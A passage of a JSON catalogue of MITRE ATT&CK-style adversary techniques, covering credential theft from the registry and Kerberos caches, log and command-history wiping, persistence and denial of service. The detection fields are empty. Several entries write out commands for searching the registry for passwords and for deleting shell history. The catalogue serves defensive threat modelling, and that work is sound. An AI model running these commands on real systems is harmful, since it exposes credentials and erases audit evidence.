create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. The certificates used during an operation may be created, acquired, or stolen by the adversary. Unlike Invalid Code Signature, this activity will result in a valid signature. Code signing to verify software on first run can be used on modern Windows and macOS systems. It is not used on Linux due to the decentralized nature of the platform. Code signing certificates may be used to bypass security policies that require signed code to execute on a system.", "detection": ""}, {"attack_id": "T1530", "name": "Data from Cloud Storage", "tactics": ["collection"], "platforms": ["IaaS", "Office Suite", "SaaS"], "description": "Adversaries may access data from cloud storage. Many IaaS providers offer solutions for online data object storage such as Amazon S3, Azure Storage, and Google Cloud Storage. Similarly, SaaS enterprise platforms such as Office 365 and Google Workspace provide cloud-based document storage to users through services such as OneDrive and Google Drive, while SaaS application providers such as Slack, Confluence, Salesforce, and Dropbox may provide cloud storage solutions as a peripheral or primary use case of their platform. In some cases, as with IaaS-based cloud storage, there exists no overarching application (such as SQL or Elasticsearch) with which to interact with the stored objects: instead, data from these solutions is retrieved directly though the Cloud API. In SaaS applications, adversaries may be able to collect this data directly from APIs or backend cloud storage objects, rather than through their front-end application or interface (i.e., Data from Information Repositories). Adversaries may collect sensitive data from these cloud storage solutions. Providers typically offer security guides to help end users configure systems, though misconfigurations are a common problem. There have been numerous incidents where cloud storage has been improperly secured, typically by unintentionally allowing public access to unauthenticated users, overly-broad access by all users, or even access for any anonymous person outside the control of the Identity Access Management system without even needing basic user permissions. This open access may expose various types of sensitive data, such as credit cards, personally identifiable information, or medical records. Adversaries may also obtain then abuse leaked credentials from source repositories, logs, or other means as a way to gain access to cloud storage objects.", "detection": ""}, {"attack_id": "T1565.003", "name": "Runtime Data Manipulation", "tactics": ["impact"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data. By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct Change Default File Association and Masquerading to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", "detection": ""}, {"attack_id": "T1552.002", "name": "Credentials in Registry", "tactics": ["credential-access"], "platforms": ["Windows"], "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons. Example commands to find Registry keys related to password information: * Local Machine Hive: reg query HKLM /f password /t REG_SZ /s * Current User Hive: reg query HKCU /f password /t REG_SZ /s", "detection": ""}, {"attack_id": "T1135", "name": "Network Share Discovery", "tactics": ["discovery"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. File sharing over a Windows network occurs over the SMB protocol. Net can be used to query a remote system for available shared drives using the net view \\\\\\\\remotesystem command. It can also be used to query shared drives on the local system using net share. For macOS, the sharing -l command lists all shared points used for smb services.", "detection": ""}, {"attack_id": "T1120", "name": "Peripheral Device Discovery", "tactics": ["discovery"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.", "detection": ""}, {"attack_id": "T1036.009", "name": "Break Process Trees", "tactics": ["stealth"], "platforms": ["Linux", "macOS"], "description": "An adversary may attempt to evade process tree-based analysis by modifying executed malware's parent process ID (PPID). If endpoint protection software leverages the “parent-child\" relationship for detection, breaking this relationship could result in the adversary’s behavior not being associated with previous process tree activity. On Unix-based systems breaking this process tree is common practice for administrators to execute software using scripts and programs. On Linux systems, adversaries may execute a series of Native API calls to alter malware's process tree. For example, adversaries can execute their payload without any arguments, call the `fork()` API call twice, then have the parent process exit. This creates a grandchild process with no parent process that is immediately adopted by the `init` system process (PID 1), which successfully disconnects the execution of the adversary's payload from its previous process tree. Another example is using the “daemon” syscall to detach from the current parent process and run in the background.", "detection": ""}, {"attack_id": "T1590.004", "name": "Network Topology", "tactics": ["reconnaissance"], "platforms": ["PRE"], "description": "Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure. Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning or Phishing for Information. Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: Search Victim-Owned Websites). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Technical Databases or Search Open Websites/Domains), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: External Remote Services).", "detection": ""}, {"attack_id": "T1587.002", "name": "Code Signing Certificates", "tactics": ["resource-development"], "platforms": ["PRE"], "description": "Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with. Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. Prior to Code Signing, adversaries may develop self-signed code signing certificates for use in operations.", "detection": ""}, {"attack_id": "T1222.001", "name": "Windows Permissions", "tactics": ["defense-impairment"], "platforms": ["Windows"], "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files. File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.). Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs). Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied. Adversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, PowerShell provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Accessibility Features, Boot or Logon Initialization Scripts, or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow.", "detection": ""}, {"attack_id": "T1137.006", "name": "Add-ins", "tactics": ["persistence"], "platforms": ["Windows", "Office Suite"], "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. Add-ins can be used to obtain persistence because they can be set to execute code when an Office application starts.", "detection": ""}, {"attack_id": "T1685.002", "name": "Disable or Modify Cloud Log", "tactics": ["defense-impairment"], "platforms": ["IaaS", "SaaS", "Identity Provider", "Office Suite"], "description": "An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity. They may alternatively tamper with logging functionality, for example, by removing any associated SNS topics, disabling multi-region logging, or disabling settings that validate and/or encrypt log files. In Office 365, an adversary may disable logging on mail collection activities for specific users by using the Set-MailboxAuditBypassAssociation cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the user’s license from an Enterprise E5 to an Enterprise E3 license.", "detection": ""}, {"attack_id": "T1505.002", "name": "Transport Agent", "tactics": ["persistence"], "platforms": ["Linux", "Windows"], "description": "Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails. Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks. Adversaries may register a malicious transport agent to provide a persistence mechanism in Exchange Server that can be triggered by adversary-specified email events. Though a malicious transport agent may be invoked for all emails passing through the Exchange transport pipeline, the agent can be configured to only carry out specific tasks in response to adversary defined criteria. For example, the transport agent may only carry out an action like copying in-transit attachments and saving them for later exfiltration if the recipient email address matches an entry on a list provided by the adversary.", "detection": ""}, {"attack_id": "T1082", "name": "System Information Discovery", "tactics": ["discovery"], "platforms": ["ESXi", "IaaS", "Linux", "macOS", "Network Devices", "Windows"], "description": "An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use this information to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. This behavior is distinct from Local Storage Discovery which is an adversary's discovery of local drive, disks and/or volumes. Tools such as Systeminfo can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the systemsetup configuration tool on macOS. Adversaries may leverage a Network Device CLI on network devices to gather detailed system information (e.g. show version). On ESXi servers, threat actors may gather system information from various esxcli utilities, such as `system hostname get` and `system version get`. Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine. System Information Discovery combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.", "detection": ""}, {"attack_id": "T1071", "name": "Application Layer Protocol", "tactics": ["command-and-control"], "platforms": ["Linux", "macOS", "Windows", "Network Devices", "ESXi"], "description": "Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, DNS, or publishing/subscribing. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.", "detection": ""}, {"attack_id": "T1574.014", "name": "AppDomainManager", "tactics": ["stealth", "execution"], "platforms": ["Windows"], "description": "Adversaries may execute their own malicious payloads by hijacking how the .NET `AppDomainManager` loads assemblies. The .NET framework uses the `AppDomainManager` class to create and manage one or more isolated runtime environments (called application domains) inside a process to host the execution of .NET applications. Assemblies (`.exe` or `.dll` binaries compiled to run as .NET code) may be loaded into an application domain as executable code. Known as \"AppDomainManager injection,\" adversaries may execute arbitrary code by hijacking how .NET applications load assemblies. For example, malware may create a custom application domain inside a target process to load and execute an arbitrary assembly. Alternatively, configuration files (`.config`) or process environment variables that define .NET runtime settings may be tampered with to instruct otherwise benign .NET applications to load a malicious assembly (identified by name) into the target process.", "detection": ""}, {"attack_id": "T1074.002", "name": "Remote Data Staging", "tactics": ["collection"], "platforms": ["ESXi", "IaaS", "Linux", "macOS", "Windows"], "description": "Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Archive Collected Data. Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location. In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may Create Cloud Instance and stage data in that instance. By staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.", "detection": ""}, {"attack_id": "T1098.006", "name": "Additional Container Cluster Roles", "tactics": ["persistence", "privilege-escalation"], "platforms": ["Containers"], "description": "An adversary may add additional roles or permissions to an adversary-controlled user or service account to maintain persistent access to a container orchestration system. For example, an adversary with sufficient permissions may create a RoleBinding or a ClusterRoleBinding to bind a Role or ClusterRole to a Kubernetes account. Where attribute-based access control (ABAC) is in use, an adversary with sufficient permissions may modify a Kubernetes ABAC policy to give the target account additional permissions. This account modification may immediately follow Create Account or other malicious account activity. Adversaries may also modify existing Valid Accounts that they have compromised. Note that where container orchestration systems are deployed in cloud environments, as with Google Kubernetes Engine, Amazon Elastic Kubernetes Service, and Azure Kubernetes Service, cloud-based role-based access control (RBAC) assignments or ABAC policies can often be used in place of or in addition to local permission assignments. In these cases, this technique may be used in conjunction with Additional Cloud Roles.", "detection": ""}, {"attack_id": "T1053", "name": "Scheduled Task/Job", "tactics": ["execution", "persistence", "privilege-escalation"], "platforms": ["Containers", "ESXi", "Linux", "macOS", "Network Devices", "Windows"], "description": "Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system. Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). Similar to System Binary Proxy Execution, adversaries have also abused task scheduling to potentially mask one-time execution under a trusted system process.", "detection": ""}, {"attack_id": "T1218.007", "name": "Msiexec", "tactics": ["stealth"], "platforms": ["Windows"], "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi). The Msiexec.exe binary may also be digitally signed by Microsoft. Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs. Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.", "detection": ""}, {"attack_id": "T1590.003", "name": "Network Trust Dependencies", "tactics": ["reconnaissance"], "platforms": ["PRE"], "description": "Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. Adversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: Search Open Technical Databases). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Active Scanning or Search Open Websites/Domains), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: Trusted Relationship).", "detection": ""}, {"attack_id": "T1498.002", "name": "Reflection Amplification", "tactics": ["impact"], "platforms": ["Windows", "IaaS", "Linux", "macOS"], "description": "Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target. This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network. Reflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS and NTP, though the use of several others in the wild have been documented. In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.", "detection": ""}, {"attack_id": "T1556.002", "name": "Password Filter DLL", "tactics": ["defense-impairment", "persistence", "credential-access"], "platforms": ["Windows"], "description": "Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts. Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation. Adversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made.", "detection": ""}, {"attack_id": "T1505.005", "name": "Terminal Services DLL", "tactics": ["persistence"], "platforms": ["Windows"], "description": "Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP. Windows Services that are run as a \"generic\" process (ex: svchost.exe) load the service's DLL file, the location of which is stored in a Registry entry named ServiceDll. The termsrv.dll file, typically stored in `%SystemRoot%\\System32\\`, is the default ServiceDll value for Terminal Services in `HKLM\\System\\CurrentControlSet\\services\\TermService\\Parameters\\`. Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts. Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal termsrv.dll functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent Remote Desktop Protocol sessions by either patching the termsrv.dll file or modifying the ServiceDll value to point to a DLL that provides increased RDP functionality. On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.", "detection": ""}, {"attack_id": "T1059.002", "name": "AppleScript", "tactics": ["execution"], "platforms": ["macOS"], "description": "Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents. These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. Scripts can be run from the command-line via osascript /path/to/script or osascript -e \"script here\". Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding #!/usr/bin/osascript to the start of the script file. AppleScripts do not need to call osascript to execute. However, they may be executed from within mach-O binaries by using the macOS Native APIs NSAppleScript or OSAScript, both of which execute code independent of the /usr/bin/osascript command line utility. Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute Native APIs, which otherwise would require compilation and execution in a mach-O binary file format. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via Python.", "detection": ""}, {"attack_id": "T1176", "name": "Software Extensions", "tactics": ["persistence"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may abuse software extensions to establish persistent access to victim systems. Software extensions are modular components that enhance or customize the functionality of software applications, including web browsers, Integrated Development Environments (IDEs), and other platforms. Extensions are typically installed via official marketplaces, app stores, or manually loaded by users, and they often inherit the permissions and access levels of the host application. Malicious extensions can be introduced through various methods, including social engineering, compromised marketplaces, or direct installation by users or by adversaries who have already gained access to a system. Malicious extensions can be named similarly or identically to benign extensions in marketplaces. Security mechanisms in extension marketplaces may be insufficient to detect malicious components, allowing adversaries to bypass automated scanners or exploit trust established during the installation process. Adversaries may also abuse benign extensions to achieve their objectives, such as using legitimate functionality to tunnel data or bypass security controls. The modular nature of extensions and their integration with host applications make them an attractive target for adversaries seeking to exploit trusted software ecosystems. Detection can be challenging due to the inherent trust placed in extensions during installation and their ability to blend into normal application workflows.", "detection": ""}, {"attack_id": "T1499.002", "name": "Service Exhaustion Flood", "tactics": ["impact"], "platforms": ["Windows", "IaaS", "Linux", "macOS"], "description": "Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well. Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service. One example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service. Another variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.", "detection": ""}, {"attack_id": "T1195.003", "name": "Compromise Hardware Supply Chain", "tactics": ["initial-access"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals.", "detection": ""}, {"attack_id": "T1106", "name": "Native API", "tactics": ["execution"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes. These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations. Adversaries may abuse these OS API functions as a means of executing behaviors. Similar to Command and Scripting Interpreter, the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system. Native API functions (such as NtCreateProcess) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries. For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes. This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations. Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code. Adversaries may use assembly to directly or in-directly invoke syscalls in an attempt to subvert defensive sensors and detection signatures such as user mode API-hooks. Adversaries may also attempt to tamper with sensors and defensive tools associated with API monitoring, such as unhooking monitored functions via Disable or Modify Tools.", "detection": ""}, {"attack_id": "T1558.005", "name": "Ccache Files", "tactics": ["credential-access"], "platforms": ["Linux", "macOS"], "description": "Adversaries may attempt to steal Kerberos tickets stored in credential cache files (or ccache). These files are used for short term storage of a user's active session credentials. The ccache file is created upon user authentication and allows for access to multiple services without the user having to re-enter credentials. The /etc/krb5.conf configuration file and the KRB5CCNAME environment variable are used to set the storage location for ccache entries. On Linux, credentials are typically stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`. On macOS, ccache entries are stored by default in memory with an `API:{uuid}` naming scheme. Typically, users interact with ticket storage using kinit, which obtains a Ticket-Granting-Ticket (TGT) for the principal; klist, which lists obtained tickets currently held in the credentials cache; and other built-in binaries. Adversaries can collect tickets from ccache files stored on disk and authenticate as the current user without their password to perform Pass the Ticket attacks. Adversaries can also use these tickets to impersonate legitimate users with elevated privileges to perform Privilege Escalation. Tools like Kekeo can also be used by adversaries to convert ccache files to Windows format for further Lateral Movement. On macOS, adversaries may use open-source tools or the Kerberos framework to interact with ccache files and extract TGTs or Service Tickets via lower-level APIs.", "detection": ""}, {"attack_id": "T1070.007", "name": "Clear Network Connection History and Configurations", "tactics": ["stealth"], "platforms": ["Linux", "macOS", "Windows", "Network Devices"], "description": "Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various artifacts that highlight connection history may be created on a system and/or in application logs from behaviors that require network connections, such as Remote Services or External Remote Services. Defenders may use these artifacts to monitor or otherwise analyze network connections created by adversaries. Network connection history may be stored in various locations. For example, RDP connection history may be stored in Windows Registry values under : * HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default * HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers Windows may also store information about recent RDP connections in files such as C:\\Users\\\\%username%\\Documents\\Default.rdp and `C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Terminal Server Client\\Cache\\`. Similarly, macOS and Linux hosts may store information highlighting connection history in system logs (such as those stored in `/Library/Logs` and/or `/var/log/`). Malicious network connections may also require changes to third-party applications or network configuration settings, such as Disable or Modify System Firewall or tampering to enable Proxy. Adversaries may delete or modify this data to conceal indicators and/or impede defensive analysis.", "detection": ""}, {"attack_id": "T1558.004", "name": "AS-REP Roasting", "tactics": ["credential-access"], "platforms": ["Windows"], "description": "Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by Password Cracking Kerberos messages. Preauthentication offers protection against offline Password Cracking. When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user’s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user’s password. For each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline Password Cracking attacks similarly to Kerberoasting and expose plaintext credentials. An account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like PowerShell with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for each user. If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data. Cracked hashes may enable Persistence, Privilege Escalation, and Lateral Movement via access to Valid Accounts.", "detection": ""}, {"attack_id": "T1584.003", "name": "Virtual Private Server", "tactics": ["resource-development"], "platforms": ["PRE"], "description": "Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves. Compromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party.", "detection": ""}, {"attack_id": "T1059.010", "name": "AutoHotKey & AutoIT", "tactics": ["execution"], "platforms": ["Windows"], "description": "Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs. Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as Phishing payloads. These scripts may also be compiled into self-contained executable payloads (`.exe`).", "detection": ""}, {"attack_id": "T1600.001", "name": "Reduce Key Space", "tactics": ["defense-impairment"], "platforms": ["Network Devices"], "description": "Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications. Adversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key. Adversaries may modify the key size used and other encryption parameters using specialized commands in a Network Device CLI introduced to the system through Modify System Image to change the configuration of the device.", "detection": ""}, {"attack_id": "T1070.003", "name": "Clear Command History", "tactics": ["stealth"], "platforms": ["ESXi", "Linux", "macOS", "Network Devices", "Windows"], "description": "In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions. Adversaries may delete their commands from these logs by manually clearing the history (history -c) or deleting the bash history file rm ~/.bash_history. Adversaries may also leverage a Network Device CLI on network devices to clear command history data (clear logging and/or clear history). On ESXi servers, command history may be manually removed from the `/var/log/shell.log` file. On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends. The PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends. Adversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.", "detection": ""}, {"attack_id": "T1202", "name": "Indirect Command Execution", "tactics": ["stealth"], "platforms": ["Windows"], "description": "Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking cmd. For example, Forfiles, the Program Compatibility Assistant (`pcalua.exe`), components of the Windows Subsystem for Linux (WSL), `Scriptrunner.exe`, as well as other utilities may invoke the execution of programs and commands from a Command and Scripting Interpreter, Run window, or via scripts. Adversaries may also abuse the `ssh.exe` binary to execute malicious commands via the `ProxyCommand` and `LocalCommand` options, which can be invoked via the `-o` flag or by modifying the SSH config file. Adversaries may abuse these features for Stealth, specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of cmd or file extensions more commonly associated with malicious payloads.", "detection": ""}, {"attack_id": "T1091", "name": "Replication Through Removable Media", "tactics": ["lateral-movement", "initial-access"], "platforms": ["Windows"], "description": "Adversaries may move onto systems, possibly those on disconnected or air-gapped 